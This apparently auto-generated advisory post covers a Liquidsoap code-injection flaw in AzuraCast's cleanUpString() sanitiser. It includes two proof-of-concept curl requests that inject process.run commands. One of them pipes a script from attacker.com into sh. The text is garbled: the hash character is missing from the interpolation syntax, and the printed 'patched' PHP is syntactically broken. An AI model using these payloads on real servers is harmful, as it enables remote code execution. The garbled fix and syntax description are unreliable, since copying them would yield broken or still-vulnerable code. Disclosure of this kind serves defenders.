Listen to this Post
The vulnerability stems from the `ConfigWriter::cleanUpString()` function in AzuraCast, located in `backend/src/Radio/Backend/Liquidsoap/ConfigWriter.php` around line 1345 . This function is intended to sanitize strings for use in Liquidsoap configuration files by replacing double quotes (") with single quotes (') and stripping newline characters (\n, \r) . However, it fails to filter or escape two critical characters: the hash symbol () and the backslash (`\`). In Liquidsoap, which uses a Ruby-like syntax, the sequence `{...}` inside a double-quoted string is treated as code interpolation, meaning the expression inside the brackets is evaluated as Liquidsoap code. Because the application does not sanitize these sequences, an attacker can inject malicious Liquidsoap code. Specifically, they can use the `process.run()` function, which executes arbitrary system commands on the host. This injection occurs through various user-controlled fields like `playlist.remote_url` or `station.description`, which are later embedded into the generated `.liq` config file. For the injected code to execute, the radio station must be restarted, an action that can be triggered by users with `Broadcasting` permissions, system updates, or CLI commands . Once restarted, Liquidsoap parses the config and runs the injected command as the `azuracast` user, leading to full remote code execution .
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: AzuraCast
Version: <= 0.23.3
Vulnerability: Code Injection
Severity: Critical
Date: 2026-03-09
<h2 style="color: blue;">Prediction: Patched 0.23.4</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
<h2 style="color: blue;">Analytics:</h2>
- Vulnerable Code: `backend/src/Radio/Backend/Liquidsoap/ConfigWriter.php` (line ~1345)
- Root Function:
public static function cleanUpString(?string $string): string
{
return str_replace(['"', "\n", "\r"], ['\'', '', ''], $string ?? '');
}
- Injection Points: Fields passed through `cleanUpString()` into double-quoted strings in `.liq` config.
<h2 style="color: blue;">Exploit:</h2>
- PoC 1 (Media Permission):
curl -X POST /api/station/1/playlists \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <API_KEY_WITH_MEDIA_PERMISSION>" \
-d '{
"name": "Malicious Remote",
"source": "remote_url",
"remote_url": "http://x{process.run('\''id > /tmp/pwned'\'')}.example.com/stream",
"remote_type": "stream",
"is_enabled": true
}'
- PoC 2 (Profile Permission):
curl -X PUT /api/station/1/profile/edit \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <API_KEY_WITH_PROFILE_PERMISSION>" \
-d '{
"name": "My Station",
"description": "{process.run('\''curl http://attacker.com/shell.sh | sh'\'')}"
}'
<h2 style="color: blue;">Protection from this CVE:</h2>
- Immediate Fix: Update to AzuraCast version `0.23.4` or later .
- Patched Code: The `cleanUpString()` function is updated to escape and \:
public static function cleanUpString(?string $string): string
{
return str_replace(
['"', "\n", "\r", '\', ''],
['\'', '', '', '\\', '\'],
$string ?? ''
);
}
– Verification Command:
grep -n "cleanUpString" backend/src/Radio/Backend/Liquidsoap/ConfigWriter.php
Impact:
Full remote code execution on the AzuraCast server as the `azuracast` user, requiring authentication with `Media` or `Profile` permissions . The attack is triggered upon station restart .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

